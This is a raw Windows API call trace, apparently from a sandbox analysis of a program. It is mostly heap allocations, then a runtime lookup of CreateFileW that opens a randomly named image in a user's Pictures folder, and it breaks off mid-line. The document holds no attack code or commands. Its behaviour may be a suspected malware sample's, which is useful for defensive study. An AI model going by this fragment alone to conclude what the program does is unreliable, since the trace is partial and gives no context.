[0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0095.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0095.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca130 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0095.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0095.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0095.656] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0095.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0095.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0095.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0095.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0095.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0095.657] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0095.657] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0095.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0095.658] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0095.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0095.658] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0095.658] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0095.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0095.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0095.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0095.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0095.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0095.659] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0095.659] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0095.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0095.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0095.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0095.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0095.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0095.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0095.660] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0095.660] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0095.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0095.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0095.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0095.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0095.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0095.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0095.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0095.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0095.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0095.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0095.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0095.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0095.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0095.661] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0095.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0095.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0095.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0095.661] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0095.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0095.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0095.661] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0095.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0095.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0095.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0095.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0095.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0095.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0095.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0095.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0095.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0095.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0095.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0095.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0095.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0095.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0095.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0095.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0095.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0095.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0095.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0095.662] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0095.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0095.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0095.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0095.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0095.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0095.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0095.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0095.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0095.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0095.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0095.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0095.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0095.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0095.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0095.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0095.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0095.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0095.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0095.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0095.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0095.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0095.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0095.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0095.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0095.663] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0095.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0095.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0095.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0095.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0095.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0095.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0095.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0095.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0095.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0095.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0095.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0095.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0095.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0095.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0095.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0095.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0095.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0095.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0095.712] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0095.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0095.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0095.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0095.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca808, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0095.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0095.712] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0095.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0095.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0095.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0095.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0095.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0095.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0095.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0095.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0095.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0095.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0095.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0095.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0095.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0095.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0095.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0095.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0095.713] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\z6qa.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\z6qa.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0095.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0095.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0095.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0095.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0095.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0095.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0095.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0095.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0095.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0095.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0095.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0095.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) 